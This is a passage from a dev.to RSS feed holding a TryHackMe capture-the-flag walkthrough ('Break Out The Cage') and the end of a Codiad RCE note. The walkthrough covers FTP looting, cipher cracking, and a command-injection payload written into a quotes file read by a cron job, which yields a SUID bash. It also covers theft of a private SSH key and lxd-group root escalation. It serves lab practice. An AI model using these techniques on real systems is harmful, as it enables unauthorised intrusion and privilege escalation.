&lt;p&gt;Flag located at: &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Bonus
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Vulnerable Codiad
&lt;/h3&gt;

&lt;p&gt;Codiad 2.8.4 is vulnerable to authenticated RCE. The exploit was tried but didn't work properly, so a shell file was uploaded instead.&lt;/p&gt;

&lt;p&gt;Info about CVE: &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2018-19423" rel="noopener noreferrer"&gt;CVE-2018-19423&lt;/a&gt; &lt;br&gt;
Exploit on ExploitDB: &lt;a href="https://www.exploit-db.com/exploits/49907" rel="noopener noreferrer"&gt;Exploit&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Break Out The Cage - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Fri, 12 Jun 2026 15:25:31 +0000</pubDate>
      <link>https://dev.to/laach_/break-out-the-cage-thm-2af6</link>
      <guid>https://dev.to/laach_/break-out-the-cage-thm-2af6</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/breakoutthecage1" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Help Cage bring back his acting career and investigate the nefarious goings on of his agent!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;p&gt;A casual &lt;code&gt;nmap&lt;/code&gt; scan:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.114 188.39 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F957a9buyzbaugio97f3j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F957a9buyzbaugio97f3j.png" alt="Nmap scan" width="800" height="562"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;21/tcp - FTP&lt;/li&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as &lt;code&gt;Weston&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Logging in to FTP as anonymous. The scan revealed a file named &lt;code&gt;dad_tasks&lt;/code&gt;. Using &lt;code&gt;get&lt;/code&gt; in FTP we can download it. Reading the file shows text encoded in base64.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3i24jd5mgpw0dq3qjewg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3i24jd5mgpw0dq3qjewg.png" alt="Base64 string" width="798" height="39"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Running this command decodes the string:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"STRING-HERE"&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After decoding, it still looked weird and unreadable. It looked like a Caesar cipher or Vigenère.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figv6ksrf7c6umz9tlzaz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figv6ksrf7c6umz9tlzaz.png" alt="Vigenère cipher" width="663" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Best tool for cipher identification is &lt;a href="https://www.boxentriq.com/analysis/cipher-identifier" rel="noopener noreferrer"&gt;Cipher Identifier&lt;/a&gt;. It identifies the most probable cipher and even suggests decoding tools. After running it, the text is identified as Vigenère. Running it through the decode tool gives something almost readable, but words are stuck together due to no spaces. Go to &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt;, select Vigenère decode, provide the identified key and paste the ciphered text.&lt;/p&gt;

&lt;p&gt;Decoded text looks like:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyh3dcs3xlj75z415o9r6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyh3dcs3xlj75z415o9r6.png" alt="Decoded string" width="800" height="218"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is a weird string. Maybe it's a password, but for who?&lt;/p&gt;

&lt;p&gt;Going to the website hosted on port 80 reveals a pseudo diary. Reading it reveals a son named &lt;code&gt;Weston&lt;/code&gt;. The note on FTP was written by Weston for his dad with an "In case I forget" message, so the weird string may be Weston's own password.&lt;/p&gt;

&lt;p&gt;Trying to log in as Weston via SSH using this string as a password works.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as Cage
&lt;/h2&gt;

&lt;p&gt;At the beginning, pspy64 was transferred onto the machine and run in a second terminal logged in to the same machine. Then:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It shows that &lt;code&gt;weston&lt;/code&gt; can run &lt;code&gt;/usr/bin/bees&lt;/code&gt; as root.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjh6fmp7bhs9qt235p4dk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjh6fmp7bhs9qt235p4dk.png" alt="Bees file" width="685" height="130"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After checking the file, it turned out it couldn't be edited and the script didn't ask for any input. It simply called &lt;code&gt;wall&lt;/code&gt; with some hardcoded text. This script was a rabbit hole.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;&lt;code&gt;wall&lt;/code&gt; stands for "write all"; it prints a message to every logged-in user with an open terminal.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;While checking pspy64 output, a cronjob running as UID=1000 (Cage) was spotted, executing every 3 minutes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftyos6cx3dwmusn7wsbj3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftyos6cx3dwmusn7wsbj3.png" alt="cron command in pspy64" width="797" height="89"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After investigating &lt;code&gt;/opt/.dads_scripts/spread_the_quotes.py&lt;/code&gt;, it turned out the script was concatenating a random quote with &lt;code&gt;wall&lt;/code&gt;. It looked like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#!/usr/bin/env python
&lt;/span&gt;
&lt;span class="c1"&gt;#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="n"&gt;lines&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/opt/.dads_scripts/.files/.quotes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;splitlines&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;quote&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lines&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;wall &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;quote&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The script was picking a random quote from &lt;code&gt;/opt/.dads_scripts/.files/.quotes&lt;/code&gt; and concatenating it directly with the &lt;code&gt;wall&lt;/code&gt; command. That file with quotes was writable. Since &lt;code&gt;os.system("wall " + quote)&lt;/code&gt; passes the string straight to the shell, the file was overwritten with a payload that copies &lt;code&gt;/bin/bash&lt;/code&gt; to &lt;code&gt;/tmp/bash&lt;/code&gt; and sets the SUID bit on it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&amp;amp;&amp;amp; cp /bin/bash /tmp/bash &amp;amp;&amp;amp; chmod +s /tmp/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; .quotes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fired again:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58xc9mbfss2omsuw4sl9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58xc9mbfss2omsuw4sl9.png" alt="cron exploit command in pspy64" width="773" height="122"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A Cage-privileged shell was obtained by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/tmp/bash &lt;span class="nt"&gt;-p&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, this gives a process running with Cage's privileges via SUID, not a full interactive shell. To get a proper shell, instead of generating a new SSH key, an existing private key was found at &lt;code&gt;/home/cage/.ssh/id_rsa&lt;/code&gt;. Copying it out and using it to connect over SSH gave a full, stable shell as Cage.&lt;/p&gt;

&lt;p&gt;Flag located at: &lt;code&gt;/home/cage/Super_Duper_Checklist&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root, Vigenère in email (intended path)
&lt;/h2&gt;

&lt;p&gt;Inside &lt;code&gt;/home/cage/email_backup/email_3&lt;/code&gt; there was a suspicious encoded string.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3umev2ged1qr5579jz3t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3umev2ged1qr5579jz3t.png" alt="email string" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Caesar was tried first, but no shift made sense. Vigenère was tried next and it cracked with the key &lt;code&gt;FACE&lt;/code&gt;. The decoded string turned out to be the root password. Logged in with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;su root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Flag located at: &lt;code&gt;/root/email_backup/email_2&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root, LXD (alternative path)
&lt;/h2&gt;

&lt;p&gt;Running &lt;code&gt;id&lt;/code&gt; after logging in as Cage:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6gety7db71q2r2k9luzu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6gety7db71q2r2k9luzu.png" alt="id command" width="793" height="50"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;User &lt;code&gt;cage&lt;/code&gt; is part of the &lt;code&gt;lxd&lt;/code&gt; group, which gives full control over the &lt;code&gt;lxd&lt;/code&gt; tool. This allows creating a container where you are root and mounting the host filesystem inside it (same concept as &lt;code&gt;docker&lt;/code&gt; group abuse).&lt;/p&gt;

&lt;p&gt;Transfer an Alpine Linux image to the machine (&lt;a href="https://github.com/saghul/lxd-alpine-builder.git" rel="noopener noreferrer"&gt;Alpine builder&lt;/a&gt;), then run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz &lt;span class="nt"&gt;--alias&lt;/span&gt; alpine
lxd init
lxc init alpine &lt;span class="o"&gt;[&lt;/span&gt;NAME-HERE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;lxc&lt;/code&gt; exploit is a bit tedious to do manually. Use this &lt;a href="https://github.com/initstring/lxd_root" rel="noopener noreferrer"&gt;script&lt;/a&gt;, transfer it to the machine and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./lxd_rootv1.sh &lt;span class="o"&gt;[&lt;/span&gt;NAME-HERE]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If everything worked, running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;su
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;should drop into a root shell without asking for a password.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
  </channel>
</rss>
